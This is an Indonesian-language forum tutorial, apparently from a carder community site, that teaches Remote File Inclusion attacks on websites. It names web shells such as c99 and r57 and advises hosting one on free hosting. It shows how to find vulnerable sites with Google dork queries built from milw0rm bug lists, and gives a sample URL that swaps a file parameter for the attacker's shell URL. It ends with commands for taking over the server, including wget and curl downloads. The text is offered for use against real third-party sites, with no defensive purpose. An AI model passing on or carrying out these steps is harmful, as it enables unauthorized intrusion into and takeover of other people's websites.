Tutorial RFI (Yang ditunggu-tunggu dan dinanti-nanti)

Akhirnya Update juga, setelah jalan-jalan dari Yogyacarderlink (ternyata isinya orang gila semua! piis om-om gay dari Yogyacarder! ^_^ Ane gak maksud untuk menjelek-jelekkan ^_^ ^_^ ^_^)

RFI adalah: Remote File Inclusion, yaitu Suatu teknik Hacking dengan meng-include-kan file ke suatu website yang ada bug RFI-nya lewat backdoor (jalur belakang aka pintu belakang)

Macam-macam Backdoor aka Web Shell:
1. c99.txt
2. c100.txt
3. r57.txt
4. ekin0x
5. locus7
Darimana anda bisa mendapatkannya yaitu tempat yang hanya 6 huruf: G-O-O-G-L-E

Tutorialz:
1. Sebelum melakukan RFI, ada baiknya kita persiapkan diri:
- Berdoa menurut kepercayaan masing-masing
- Web Browser
- Shell yang udah didapatkan (kalo dapet dari punya orang laen, mending dicatet URL-nya, soalnya kita bakal pakek buat RFI-nya, kalo punya sendiri, upload dulu ke hostingan dan saya anjurkan untuk meminumnya 3x sehari supaya efeknya 100% memakai hosting 000webhost.com atawa freewebtown.com kalo gak mau suspend dengan cepat dan mudah, sangat tidak dianjurkan untuk bertemu Roy Suryo memakai freehostia karena menurut para gay warga Yogyacarderlink freehostia upload shell langsung disuspend... lalu anda catet URL-nya, nanti bakal dipakek)
- akses ke milw0rm/Kumpulan Bug RFI (dipilih aje atu2)
2. Buka milw0rm lalu cari bug RFI (di search ketik: RFI) lalu ambil salah satu bug RFI.... atawa kalo udah dapet bug RFI, yaudah...
3. Search digoogle Bugsnya misal exploitna: admin/aaa/direktori/direktori2/file=[shell] ya carinya inurl:admin/aaa/direktori/direktori2/file=
4. Comot satu target (bahasanya ambhuradhul) misalnya dapet: www.target.com/admin/aaa/direktori/direktori2/file=tolol.txt
5. Ganti tolol.txt jadi URL shellnya, jadinya begini: www.target.com/admin/aaa/direktori/direktori2/file=www.situsgue.hosting.com/shell/c99.txt? (jangan lupa ditambah "?" tanpa tanda kutip (Tanda tanya))
6. Kalo gak keluar shellnya (ada fasilitas Upload dan buat Masukin Codenya, pokoknya mirip-mirip FTP Manager gituu...) berarti gak vuln lagi, jangan sedih dan marah, cari aja yang laen... ^_^ kalo keluar shellna, lanjoet aje... tinggal kita takeover ntu wepsait... (NGIHAHAHAHAHA!!!)
7. Kita pakek command-command berikut buat takeover:
Uname -a = Melihat jenis or nama server or type server yg di gunakan !!!!
cat /etc/issue = melihat jenis kernel dari suatu server !!!!
curl -o , wget , lwp-download = mendownload sebuah file
find = mencari ( tampilkan , temukan )
8. Terserah mahu ngapain (logatnya mulai agak najis... ^_^)
---END---
Thanks to: kiddies dan ycl dari Yogyacarderlink
Sumber: yogyacarderlink.web.id